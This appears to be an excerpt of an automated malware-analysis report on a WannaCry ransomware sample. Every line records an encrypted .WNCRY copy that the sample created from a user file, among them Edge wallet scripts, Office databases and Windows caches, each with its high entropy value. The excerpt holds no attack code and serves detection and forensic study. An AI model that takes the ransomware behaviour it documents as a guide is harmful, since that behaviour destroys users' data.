              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\auto_open_controller.js.WNCRY (copy) entropy: 7.99985345761Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_checkout_page_validator.js.WNCRY (copy) entropy: 7.99981081909Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_confirmation_page_validator.js.WNCRY (copy) entropy: 7.99983863305Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_driver.js.WNCRY (copy) entropy: 7.99989229228Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_tracking_page_validator.js.WNCRY (copy) entropy: 7.9977352683Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\product_page.js.WNCRY (copy) entropy: 7.99984585845Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shopping.js.WNCRY (copy) entropy: 7.99996397914Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shoppingfre.js.WNCRY (copy) entropy: 7.99950765031Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\edge_driver.js.WNCRY (copy) entropy: 7.99990418986Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\shopping_iframe_driver.js.WNCRY (copy) entropy: 7.99388027995Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\vendor.bundle.js.WNCRY (copy) entropy: 7.99987275815Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\wallet.bundle.js.WNCRY (copy) entropy: 7.99994618303Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl\bnpl.bundle.js.WNCRY (copy) entropy: 7.99976009055Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet\miniwallet.bundle.js.WNCRY (copy) entropy: 7.99956665427Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification.bundle.js.WNCRY (copy) entropy: 7.99962678338Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification_fast.bundle.js.WNCRY (copy) entropy: 7.99947497095Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Tokenized-Card\tokenized-card.bundle.js.WNCRY (copy) entropy: 7.99959934714Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\wallet-drawer.bundle.js.WNCRY (copy) entropy: 7.99986337067Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.WNCRY (copy) entropy: 7.99296596287Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db.WNCRY (copy) entropy: 7.99307418223Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db.WNCRY (copy) entropy: 7.9923050146Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db.WNCRY (copy) entropy: 7.99274076183Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db.WNCRY (copy) entropy: 7.99042253799Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{0DD3376E-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.WNCRY (copy) entropy: 7.99959135047Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000015.db.WNCRY (copy) entropy: 7.99847969771Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db.WNCRY (copy) entropy: 7.99842769341Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000005.db.WNCRY (copy) entropy: 7.99754370481Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db.WNCRY (copy) entropy: 7.99979079866Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db.WNCRY (copy) entropy: 7.99994795114Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db.WNCRY (copy) entropy: 7.99991740428Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db.WNCRY (copy) entropy: 7.9998173688Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db.WNCRY (copy) entropy: 7.99634112935Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db.WNCRY (copy) entropy: 7.99983996973Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRY (copy) entropy: 7.99982398938Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRY (copy) entropy: 7.99982493577Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db.WNCRY (copy) entropy: 7.99983253865Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRY (copy) entropy: 7.99996595789Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRY (copy) entropy: 7.99390075091Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\33CUD2J1\ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2[1].js.WNCRY (copy) entropy: 7.99957246403Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\33CUD2J1\ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2[1].js.WNCRY (copy) entropy: 7.99953815761Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\90SNK17T\oneDs_f2e0f4a029670f10d892[1].js.WNCRY (copy) entropy: 7.99899626123Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qoVhSFA2[1].js.WNCRY (copy) entropy: 7.99486309129Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOqiqEgQ2[1].js.WNCRY (copy) entropy: 7.99488676091Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db.WNCRY (copy) entropy: 7.99982678579Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\0JQ5B395\microsoft-365-logo-01d5ecd01a[1].png.WNCRY (copy) entropy: 7.9922177956Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\0JQ5B395\pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7[1].js.WNCRY (copy) entropy: 7.99521947637Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\0JQ5B395\pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7[1].js.WNCRY (copy) entropy: 7.9903807642Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\6EVGB5XB\pwa-bootstrap-5e7af218e953d095fabf[1].js.WNCRY (copy) entropy: 7.99763430975Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\6EVGB5XB\pwa-mru.2ce72562ad7c0ae7059c.chunk.v7[1].js.WNCRY (copy) entropy: 7.99624977378Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\7OUVBIZR\pwa-vendor-bundle-ba2888a24179bf152f3d[1].js.WNCRY (copy) entropy: 7.99973382747Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\otel-logger-104bffe9378b8041455c[1].js.WNCRY (copy) entropy: 7.99792319314Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\pwa-bundle-3a99f64809c6780df035[1].js.WNCRY (copy) entropy: 7.99986403796Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\pwa-forms-group~mru~officeforms-group-forms~officeforms-my-forms~places.bcdc404c7fe22f14ccad.chunk.v7[1].js.WNCRY (copy) entropy: 7.99575075235Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\sharedscripts-939520eada[1].js.WNCRY (copy) entropy: 7.99615316369Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\OB7JJZIK\staticpwascripts-30998bff8f[1].js.WNCRY (copy) entropy: 7.99033781663Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AppData\CacheStorage\CacheStorage.edb.WNCRY (copy) entropy: 7.99987830596Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb.WNCRY (copy) entropy: 7.9998740337Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\1Sd5265G8OlnRColAI8O_SxSQ1Q.br[1].js.WNCRY (copy) entropy: 7.9987094026Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\1_gc11zDuaJOyBP7gyptBGdPRf4.br[1].js.WNCRY (copy) entropy: 7.99697630682Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\584482RVjBIoEvVSe0RsuS1I4YQ.br[1].js.WNCRY (copy) entropy: 7.99579321527Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\6hU_LneafI_NFLeDvM367ebFaKQ[1].js.WNCRY (copy) entropy: 7.9928989519Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\6qhc82nhlRe74lC1CBjrzThsaXw.br[1].js.WNCRY (copy) entropy: 7.99512173514Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\aABLNT_FV45QjYQfnRHrBCAk4GU[1].js.WNCRY (copy) entropy: 7.9983293364Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\DccpWCpoNzCwM4Qymi_Ji67Ilso.br[1].js.WNCRY (copy) entropy: 7.99862862088Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\EYNLM9RfkEXFtD8WH1unvJjwzGA.br[1].js.WNCRY (copy) entropy: 7.99022560916Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\f8FI06PDUmw1Zws81nUDYY3bWsY.br[1].js.WNCRY (copy) entropy: 7.99637488126Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\HSDak9V_lmtkNU64sorwQW-6T38.br[1].js.WNCRY (copy) entropy: 7.99987680578Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\Ix6gLNUjdsfo1b44Xv9sX0Ilnxw.br[1].js.WNCRY (copy) entropy: 7.99804588737Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\Kwh038ybdvX_puLwdopqHydJtVM.br[1].js.WNCRY (copy) entropy: 7.99953476104Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\lh0O3d6Fmm9PYPDqG8PqHJ4MS7w.br[1].js.WNCRY (copy) entropy: 7.99765168229Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\lpbsfnKE_8agtRF97FH08WFLR1w.br[1].js.WNCRY (copy) entropy: 7.99941120979Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\MgSq5EEOyYvlI1qVlLOXfgRHmzM.br[1].js.WNCRY (copy) entropy: 7.99798424395Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\MR6Zgdyo2coaDBmJxRBOLkPvlpk.br[1].js.WNCRY (copy) entropy: 7.99923040544Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\Ov6JSivEymftttgBEDwd3JIRgz0.br[1].js.WNCRY (copy) entropy: 7.99924475914Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\RfoQ_WQ8YccBpTTC1JFx7r-9GWU.br[1].js.WNCRY (copy) entropy: 7.99903034599Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\UHyc3IjuWFO6s9IoOlmmJWw7Jqs.br[1].js.WNCRY (copy) entropy: 7.99963108594Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\vPBP7RPIJrbNZlhe-HUXYkcDX0A.br[1].js.WNCRY (copy) entropy: 7.99719790776Jump to dropped file
